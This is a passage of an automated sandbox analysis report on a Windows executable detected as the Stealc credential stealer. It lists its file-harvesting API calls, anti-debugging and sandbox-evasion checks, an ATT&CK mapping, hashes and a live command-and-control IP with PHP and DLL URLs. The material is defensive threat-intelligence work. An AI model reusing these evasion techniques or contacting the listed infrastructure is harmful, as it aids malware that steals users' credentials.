              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00911269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00911269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00912390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00912390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0090DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0090DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0091CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00914B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00914B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00914B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00914B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0091DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0091D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009016A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00921BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00921BF0
              Source: file.exe, file.exe, 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1518473176.0000000001646000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1518473176.00000000015CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1518473176.0000000001612000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
              Source: file.exe, 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25848
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25856
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25701
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25721
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00904A60 VirtualProtect 00000000,00000004,00000100,?0_2_00904A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00926390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00926390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00926390 mov eax, dword ptr fs:[00000030h]0_2_00926390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00922AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00922AD0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009246A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_009246A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00924610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00924610
              Source: file.exe, file.exe, 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: LRy\Program Manager
              Source: file.exe, 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oLRy\Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00922D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00921B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00921B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00922A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00922A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00922C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00922C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1430969378.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1430969378.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe39%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phpKZ100%Avira URL Cloudmalware
              http://185.215.113.206/ninet.dll100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206file.exe, 00000000.00000002.1518473176.00000000015CE000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206/ninet.dllfile.exe, 00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/8file.exe, 00000000.00000002.1518473176.0000000001629000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.phpKZfile.exe, 00000000.00000002.1518473176.00000000015CE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.206
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1561817
                      Start date and time:2024-11-24 11:32:11 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 4m 18s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:6
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 79%
                      • Number of executed functions: 18
                      • Number of non-executed functions: 120
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: file.exe

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.206file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206/c4becf79229cb002.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC StealerBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                      • 185.215.113.206

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.944465366904774
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'790'976 bytes
                      MD5:6ae8d6dbe0f7340866c08c3f7b65978a
                      SHA1:b1afeaa2019c2df5c0be69191ed9c91ba0af72cd
                      SHA256:425637dfc7232d7373898820b23226d268bf36496b766b5e367a06855864549f
                      SHA512:b813ff37f5d50473cc7c874eb35656c1faee5fb21e3f67c235c68553aab7769d87021c1c70efc2259470ce7a2f9399191d7b73c0ccf20bceb2b6946bc5e34961
                      SSDEEP:24576:8Y+gq4ZwFfNQ+eMiqVrQq+7HFycKspltUVyY2m6JfYNEor14HJ/uH+xW6CS6fzkL:8YqLFS+ec0HFyDspbu6JLOcnbEzo874
                      TLSH:ED8533445FBFEA81DC528A7100BBB71119FFF28E9864CF270AD615B92C0ADAD65704CB
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0xa8f000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F11A0BA7FAAh
                      rdmsr
                      sbb eax, dword ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      jmp 00007F11A0BA9FA5h
                      add byte ptr [edx], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edx], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], cl
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

